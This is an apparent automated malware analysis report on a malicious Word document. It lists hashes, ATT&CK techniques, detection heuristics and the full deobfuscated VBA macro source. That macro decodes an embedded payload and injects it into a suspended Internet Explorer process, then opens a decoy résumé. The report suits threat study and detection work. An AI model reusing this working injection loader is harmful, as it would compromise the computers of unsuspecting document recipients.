Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d132b3929c445519…

MALICIOUS

Office (OLE)

Size: 424.0 KB
Created: 2019-02-20 20:27:00
Authoring application: Microsoft Office Word
First seen: 2019-12-10
MD5: 2eec77bc74ebccdda065d0a97dbd11ff
SHA-1: 2b763d09a21e0b38d206122e3de3615c739a3fd8
SHA-256: d132b3929c445519117253941c67f7c968836b34f0e85b44e61eb51559797e85
Risk score: 508

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages CVE-2007-3899, a memory corruption vulnerability, to achieve code execution. Its VBA macros declare and call Windows API functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating the likely intent to inject a second-stage payload into another process and execute it there. The presence of XOR-encoded strings and embedded OLE packages further supports this assessment.

Heuristics (16)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption (critical; CVE likely; CVE_2007_3899)
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • OLE with Ole10Native — possible CVE-2026-21514 exploitation (high; CVE likely; CVE_2026_21514)
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.Injection-6355574-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
  • Reference to WriteProcessMemory API (critical; SC_STR_WRITEPROCESSMEMORY)
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API (critical; SC_STR_CREATEREMOTETHREAD)
    Reference to CreateRemoteThread API
  • XOR-encoded strings (key 0x5A) (critical; SC_XOR_ENCODED)
    Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
    Disassembly
    Attempted x86 opcode disassembly
  • Reference to CreateProcess API (high; SC_STR_CREATEPROCESS)
    Reference to CreateProcess API
  • VBA macros detected (medium; 4 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (high; OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
      Dim zuyEUBwvBu
      Set zuyEUBwvBu = CreateObject("ADODB.Stream")
      zuyEUBwvBu.Type = tGokxOkxcj
  • AutoOpen macro (low; OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        cnKxRQHXdMtg
  • Workbook_Open macro (low; OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
        cnKxRQHXdMtg
  • Environ() call (env variable access) (low; OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script
        If Len(Environ("ProgramW6432")) > 0 Then
            FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
  • Reference to VirtualAlloc API (medium; SC_STR_VIRTUALALLOC)
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size

macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9300 bytes
SHA-256: f2abc6d250de8e3c9503849bf486c7e64fce4f2638bab40cf45f445f7419f808
Detection
ClamAV: No threats found
Obfuscation or payload: likely
85 of 148 identifiers look randomly generated (e.g. 'mTPHtgtuhhCgfAy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const tGokxOkxcj = 1
Const yfCpjuXVzi = 1, iBjNEmtJSn = 2, lFYZvNmnEd = 8

Private Type svkHMGtJfRvA
    xNgghSwGIXgF As Long
    XHETiRnOIOTr As Long
    hudVNHMplvpl As Long
    AuYDBxxPUELV As Long
End Type

Private Type rpdlqsAizKtR
    SBENpOaCqhhT As Long
    WHZRpTmGGnPR As String
    qekmUCkgSkyu As String
    EtVlgTegaphC As String
    MuWNfBuxTIKO As Long
    kCPbmbwkSBdb As Long
    fQsifyyrXPdT As Long
    qpoykOvyKNlO As Long
    xSbPQJFMSNnk As Long
    xhCLBvXlTTBX As Long
    gbMFBYRIuTmm As Long
    eKsOfUYZlaxk As Long
    oVTwfSdSyATN As Integer
    XXqDiKTLeGYE As Integer
    MrjbyoXieMAh As Long
    RrBTbvECxWMh As Long
    lifIeTJZPfoI As Long
    YRdthPyABufO As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As LongPtr, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As LongPtr
    Private Declare PtrSafe Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As LongPtr
    Private Declare PtrSafe Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As LongPtr, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As LongPtr) As LongPtr
    Private Declare PtrSafe Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal VdWOpNntkPgY As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#Else
    Private Declare Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As Long, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As Long
    Private Declare Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As Long
    Private Declare Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As Long, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As Long) As Long
    Private Declare Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal lpCurrentDriectory As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#End If

Sub cnKxRQHXdMtg()
    Dim ORaPXCWnNLMe As Long, DEJUdyWdRzJp As Variant, DTPNyTaCSmtl As Long
    Dim POVFbElAqElk As svkHMGtJfRvA
    Dim AtOshUIkSfgE As rpdlqsAizKtR
    Dim fsIvNhSPRjJW As String
    Dim FZTUWHNdxNIa As String
    Dim bPIWbDKsDK As String
    Dim XdRGLKEqmF() As Byte
    Dim UCFZKhmEEi As Boolean
    
#If VBA7 Then
    Dim rWuHUgktEqbX As LongPtr, fddzPhSPliSJ As LongPtr
#Else
    Dim rWuHUgktEqbX As Long, fddzPhSPliSJ As Long
#End If
    DEJUdyWdRzJp = hmlhxkqg

    If Len(Environ("ProgramW6432")) > 0 Then
        FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
    Else
        FZTUWHNdxNIa = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
    End If

    fddzPhSPliSJ = vZwPvAkhtkWb(fsIvNhSPRjJW, FZTUWHNdxNIa, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, fsIvNhSPRjJW, AtOshUIkSfgE, POVFbElAqElk)

    rWuHUgktEqbX = ccutHHdLbTqJ(POVFbElAqElk.xNgghSwGIXgF, 0, UBound(DEJUdyWdRzJp), &H1000, &H40)
    For DTPNyTaCSmtl = LBound(DEJUdyWdRzJp) To UBound(DEJUdyWdRzJp)
        ORaPXCWnNLMe = DEJUdyWdRzJp(DTPNyTaCSmtl)
        fddzPhSPliSJ = lZilpIMnjQTS(POVFbElAqElk.xNgghSwGIXgF, rWuHUgktEqbX + DTPNyTaCSmtl, ORaPXCWnNLMe, 1, ByVal 0&)
    Next DTPNyTaCSmtl
    fddzPhSPliSJ = QDamTkzkAwhS(POVFbElAqElk.xNgghSwGIXgF, 0, 0, rWuHUgktEqbX, 0, 0, 0)
    
    bPIWbDKsDK = Environ("TEMP") & "\Resume (2).doc"
    XdRGLKEqmF = vdtevtae
    UCFZKhmEEi = KsbcuZbpzm(bPIWbDKsDK, XdRGLKEqmF)
    
    Set temp = ActiveDocument
    Documents.Open (bPIWbDKsDK)
    temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub

Function KsbcuZbpzm(rASJJubWmd, AtWCTjfzjw)
  Dim zuyEUBwvBu
  Set zuyEUBwvBu = CreateObject("ADODB.Stream")
  zuyEUBwvBu.Type = tGokxOkxcj

  zuyEUBwvBu.Open
  zuyEUBwvBu.Write AtWCTjfzjw

  zuyEUBwvBu.SaveToFile rASJJubWmd, iBjNEmtJSn
End Function

Sub AutoOpen()
    cnKxRQHXdMtg
End Sub
Sub Workbook_Open()
    cnKxRQHXdMtg
End Sub


Function hmlhxkqg() As Byte()
    Dim hcCzdOOBNPoQmAw() As Byte
    Dim mTPHtgtuhhCgfAy As Long
    Dim VaegvWOIekAOUFD(7) As Byte
    Dim DTPNyTaCSmtl As Long
    Dim PdihewuviArgiTP() As Byte
    Dim UCFZKhmEEi As Boolean
    
    hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
    mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
    
    
        VaegvWOIekAOUFD(0) = 89
    
        VaegvWOIekAOUFD(1) = 68
    
        VaegvWOIekAOUFD(2) = 88
    
        VaegvWOIekAOUFD(3) = 82
    
        VaegvWOIekAOUFD(4) = 81
    
        VaegvWOIekAOUFD(5) = 78
    
        VaegvWOIekAOUFD(6) = 70
    
        VaegvWOIekAOUFD(7) = 73

    
    DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
    PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 212481 - 1)
    UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
    
    hmlhxkqg = PdihewuviArgiTP
End Function

Function vdtevtae() As Byte()
    Dim hcCzdOOBNPoQmAw() As Byte
    Dim mTPHtgtuhhCgfAy As Long
    Dim VaegvWOIekAOUFD(7) As Byte
    Dim DTPNyTaCSmtl As Long
    Dim PdihewuviArgiTP() As Byte
    Dim UCFZKhmEEi As Boolean
    
    hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
    mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
    
    
        VaegvWOIekAOUFD(0) = 79
    
        VaegvWOIekAOUFD(1) = 83
    
        VaegvWOIekAOUFD(2) = 84
    
        VaegvWOIekAOUFD(3) = 86
    
        VaegvWOIekAOUFD(4) = 88
    
        VaegvWOIekAOUFD(5) = 79
    
        VaegvWOIekAOUFD(6) = 90
    
        VaegvWOIekAOUFD(7) = 86

    
    DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
    PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 91368 - 1)
    UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
    
    vdtevtae = PdihewuviArgiTP
End Function

Function KMbsvKCbcv(abArray() As Byte) As Long
    Dim nLen As Long
    KMbsvKCbcv = UBound(abArray) - LBound(abArray) + 1
End Function

Function IEXWPMPhCY(WIdavqNInj As String)
    Dim fqQEZtmCAY() As Byte
    Dim hLLoHruxpI As Integer: hLLoHruxpI = FreeFile
    
    Open WIdavqNInj For Binary Access Read As #hLLoHruxpI
    ReDim fqQEZtmCAY(0 To LOF(hLLoHruxpI) - 1)
    Get #hLLoHruxpI, , fqQEZtmCAY
    Close #hLLoHruxpI
    
    IEXWPMPhCY = fqQEZtmCAY
End Function

Function lmiXHsJtIc(yRAUzytyxg() As Byte, InSWDbVSQV() As Byte) As Long
    Dim JtlPFmtZxb As Boolean
    Dim XvfafqmCwl As Long
    Dim KhcWWSjSzH As Long
    Dim NfjyhACega As Long
    Dim HZBcGDGTdi As Long
    
    JtlPFmtZxb = False
    NfjyhACega = KMbsvKCbcv(yRAUzytyxg)
    HZBcGDGTdi = KMbsvKCbcv(InSWDbVSQV)
    For XvfafqmCwl = 0 To NfjyhACega
        JtlPFmtZxb = True
        For KhcWWSjSzH = 0 To HZBcGDGTdi - 1
                If yRAUzytyxg(XvfafqmCwl + KhcWWSjSzH) <> InSWDbVSQV(KhcWWSjSzH) Then
                    JtlPFmtZxb = False
                    Exit For
                End If
        Next KhcWWSjSzH
        If JtlPFmtZxb = True Then
            Exit For
        End If
    Next XvfafqmCwl
    
    If JtlPFmtZxb = False Then
        lmiXHsJtIc = -1
    Else
        lmiXHsJtIc = XvfafqmCwl
    End If
    
End Function

Function OdxXAAOyHk(yRAUzytyxg() As Byte, CZAMdvjYTR As Long, yOCftnDOtp As Long) As Byte()
    Dim XJZLYcxXxl() As Byte
    Dim XvfafqmCwl As Long

    For XvfafqmCwl = 0 To yOCftnDOtp
        ReDim Preserve XJZLYcxXxl(XvfafqmCwl)
        XJZLYcxXxl(XvfafqmCwl) = yRAUzytyxg(CZAMdvjYTR + XvfafqmCwl)
    Next XvfafqmCwl
    
    OdxXAAOyHk = XJZLYcxXxl
End Function

Function vYtGxWFzfz(DTuPXKmgaH() As Byte, yOCftnDOtp As Long)
    
    Dim XexIxXIqPo As Byte
    Dim RmhahkOqfk As Long
    XexIxXIqPo = 90
    
    For RmhahkOqfk = 0 To yOCftnDOtp - 1
        DTuPXKmgaH(RmhahkOqfk) = DTuPXKmgaH(RmhahkOqfk) Xor XexIxXIqPo
    Next RmhahkOqfk
    
End Function

ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612170789/Ole10Native | 91842 bytes
SHA-256: 684512f174a335f854fdbad1e66292baad0f362863d3b314dad8bd4a68b753a7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.92, consistent with packed or encrypted content.

ole10native_01.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1612170790/Ole10Native | 212955 bytes
SHA-256: 17cf52f85bc83040e8eb6559205231c0c10e971a23863663330a61f4a2c1caf9